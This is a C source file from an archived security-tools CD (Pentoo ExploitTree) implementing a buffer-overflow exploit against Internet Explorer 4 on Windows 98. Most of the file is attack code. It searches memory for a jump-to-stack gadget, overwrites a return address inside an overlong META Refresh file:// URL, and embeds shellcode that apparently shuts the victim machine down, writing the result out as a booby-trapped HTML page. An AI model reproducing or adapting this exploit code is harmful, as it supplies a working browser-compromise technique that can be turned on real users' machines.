home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / IE / ie4filex.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.5 KB  |  87 lines
  1. /*=============================================================================
  2.    Microsoft IE4 for Windows98 exploit
  3.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  4.    Written by UNYUN (shadowpenguin@backsection.net)
  5.   =============================================================================
  6. */
  7.  
  8. #include    <stdio.h>
  9. #include    <windows.h>
  10.  
  11. #define     MAXBUF          1000
  12. #define     RETADR          53
  13.  
  14.  
  15. unsigned int mems[]={
  16. 0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
  17. 0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
  18. 0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
  19. 0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
  20. 0xbffc9000,0xbffe3000,0,0};
  21.  
  22. unsigned char   exploit_code[200]={
  23. 0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
  24. 0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
  25. 0xFF,0xD0,0x00,
  26. };
  27.  
  28. unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
  29.                 unsigned char c1,unsigned char c2)
  30. {
  31.     unsigned char   *p;
  32.     unsigned int    adr;
  33.  
  34.     for (p=st;p<ed;p++)
  35.         if (*p==c1 && *(p+1)==c2){
  36.             adr=(unsigned int)p;
  37.             if ((adr&0xff)==0) continue;
  38.             if (((adr>>8)&0xff)==0) continue;
  39.             if (((adr>>16)&0xff)==0) continue;
  40.             if (((adr>>24)&0xff)==0) continue;
  41.             return(adr);
  42.         }
  43.     return(0);
  44.  
  45. }
  46.  
  47.  
  48. main(int argc,char *argv[])
  49. {
  50.     FILE                    *fp;
  51.     unsigned int            i,ip;
  52.     unsigned char           buf[MAXBUF];
  53.  
  54.     if (argc<2){
  55.         printf("usage %s output_htmlfile\n",argv[0]);
  56.         exit(1);
  57.     }
  58.     if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;   
  59.     fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
  60.     for (i=0;;i+=2){
  61.         if (mems[i]==0){
  62.             printf("Can not find jmp code.\n");
  63.             exit(1);
  64.         }
  65.         if ((ip=search_mem(fp,(unsigned char *)mems[i],
  66.             (unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
  67.     }
  68.     printf("Jumping address : %x\n",ip);
  69.     memset(buf,0x41,MAXBUF);
  70.     
  71.     buf[RETADR-1]=0x90;
  72.     buf[RETADR  ]=ip&0xff;
  73.     buf[RETADR+1]=(ip>>8)&0xff;
  74.     buf[RETADR+2]=(ip>>16)&0xff;
  75.     buf[RETADR+3]=(ip>>24)&0xff;
  76.  
  77.     memcpy(buf+80,exploit_code,strlen(exploit_code));
  78.     buf[MAXBUF]=0;
  79.     fprintf(fp,"%s/\">\n<HTML><B>",buf);
  80.     fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>");
  81.     fprintf(fp,"If you are using IE4 for Japanese Windows98, ");
  82.     fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>");
  83.     fprintf(fp,"</HTML>\n");
  84.     fclose(fp);
  85.     printf("%s created.\n",argv[1]);
  86.     return FALSE;
  87. }